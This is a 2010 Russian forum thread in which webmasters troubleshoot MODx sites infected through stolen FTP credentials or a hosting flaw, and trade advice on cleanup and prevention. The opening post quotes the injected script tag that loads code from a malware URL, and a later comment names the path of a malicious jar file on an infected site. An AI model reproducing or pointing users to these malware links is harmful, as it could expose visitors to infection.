Разделы

Прямой эфир

Весь эфир | RSS

Блоги

Все блоги

Взломали сайт на modx

Один заказчиков пожаловался на то, что гугл стал считать его сайт опасным для просмотра. Заказчик утверждает что пароли доступа не могли ни куда утечь. В коде страници между тегом Head и body красуется строчка 
<script src=http://warez.clickwm.ru/uploads/indexd.php ></script>
Каким образом она могла туда попасть не понятно. В шаблоне этого нет и в теле страницы тоже. Кто ни буть сталкивался с подобными проблемами если да то какие методы решения и латания дыры?
  • 0
  • 11 марта 2010, 14:33
  • chus

Комментарии (20)

RSS свернуть / развернуть
+4
да сталкивался заражаются афайлы index*.* main*.* default*.* в них дописывается эта строчка.

Скорее всего у токо кто имеет доступ к сайту (ftp) на компе был или есть вирус.
avatar

tonatos

  • 11 марта 2010, 14:38
0
Да, именно так чаще всего и происходит. Часто вирусня ворует пароли от FTP из тотал коммандера и иже с ними.
avatar

pitbull

  • 11 марта 2010, 14:53
0
Да очень похоже на то, что у кого то, кто входил по ftp, сидит троян. Тоже сталкивался с таким.
avatar

sasas

  • 11 марта 2010, 15:07
0
Тоже гугл жалуется:( только на что не могу понять:(
ukrgreentour.com.ua
avatar

Dmi3y

  • 11 марта 2010, 14:39
0
/s/spl/1.jar
там собака порылась
avatar

abadello

  • 11 марта 2010, 17:34
-1
ничего не понял:(
avatar

Dmi3y

  • 11 марта 2010, 17:38
0
ukrgreentour.com.ua/s/spl/1.jar
вирусный код в этом файле
avatar

abadello

  • 12 марта 2010, 10:55
0
ну я так и подумал сначала но ни папки ни файла не нашел на фтп :)
avatar

Dmi3y

  • 12 марта 2010, 13:12
0
eset nod32 так говорит
avatar

abadello

  • 12 марта 2010, 13:13
0
Спасибо пойду писать хостеру:)
avatar

Dmi3y

  • 12 марта 2010, 13:19
0
Хостер тебе не поможет.
Обнови модкс и в панели управления хостингом запрети доступ к ФТП. используй только вэб-доступ (их самой панели) тогда даже если вирус снова украдет пароли, то не сможет зайти.
Так же можно добавить исключения для твоег айпи адреса. тогда можно заходить и через FAR
avatar

rudenko

  • 13 марта 2010, 02:21
0
Была подобная штука на hostpro.ua. У меня была иньекция китайского js кода, собирал какие-то данные на разных WP поверед сайтах. Убрал, повторилось. Получилось, что более 70% сайтов на том шаред сервере были заражены… Итог: из-за уязвимости CPanel (не MODx) все страдали очень долго, вылечились только после вмешательства хостера.
Кстати, посмотри (могут быть где угодно, сортируй по размеру) файлы вида core.xxxxxx, у меня их больше 1Гб собралось.
avatar

atma

  • 13 марта 2010, 06:20
0
Собственно у меня вирус именно на HOSTPRO.UA

avatar

Dmi3y

  • 19 марта 2010, 16:13
0
Как определить что вирус и менно на хостинге? Я например не нашел нигде в файлах этоот код вируса… возможно вирус у хоста. У меня уже 3 сайта с 10ти пораненные, реально не знаю что делать. МодХ новый закидывал, дампы паз делал — все то же самое…
avatar

Spatial

  • 3 апреля 2010, 03:39
+1
Код страниц смотрите. Вирус чаще всего поражает все php/html файлы и прописывает в них код iframe`а, в котором вызывается вирус. Внимательно посмотрите в браузере исходный код страницы.
avatar

pitbull

  • 3 апреля 2010, 18:14
0
Я пока что ни разу (тьфу-тьфу-тьфу) не сталкивался ни с чем, что распространяется через FTP. Один раз получил заражение 10 сайтов. Все через ворованные пароли из FileZilla. Заражались все файлы index.* и все *.js
Переустановка движка, переустановка всех плагинов, смена ftp паролей и (!) теперь я все пароли держу в башке :)))))))))) Если разработать свой алгоритм — это совсем не сложно. Робот не догадается, а с человеками надо поосторожней быть. :)
avatar

banev

  • 3 апреля 2010, 23:51
0
Блин, первую фразу не так построил :). Короче, у меня заражения происходили ТОЛЬКО через ворованные FTP!
avatar

banev

  • 3 апреля 2010, 23:52
0
что уже я только не делал — последнее что я сделал это ПОЛНОСТЬЮ УДАЛИЛ ПАПКУ С ДОМЕНОМ И БАЗУ ДАНЫХ. Создал обратно папку с тем самым доменом — захожу на домен (там ничего нет просто папка с названием домена) — вирус
avatar

Spatial

  • 4 апреля 2010, 14:31
0
— и думаю что это подтверждение того что вирус не у меня на сайтах а у хостера
avatar

Spatial

  • 4 апреля 2010, 14:41
0
еще один опыт — если переношу все файлы в другую папку (называю другим доменом) — нет никакого вируса. Как тольно называю тем доменом где вирус был — опять вирус появляется. Просто смешно, в голову не укладывается как такое может быть.
avatar

Spatial

  • 4 апреля 2010, 17:39

Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.
© Сделано на LiveStreet
Дизайн - ©2009 MODx RED Group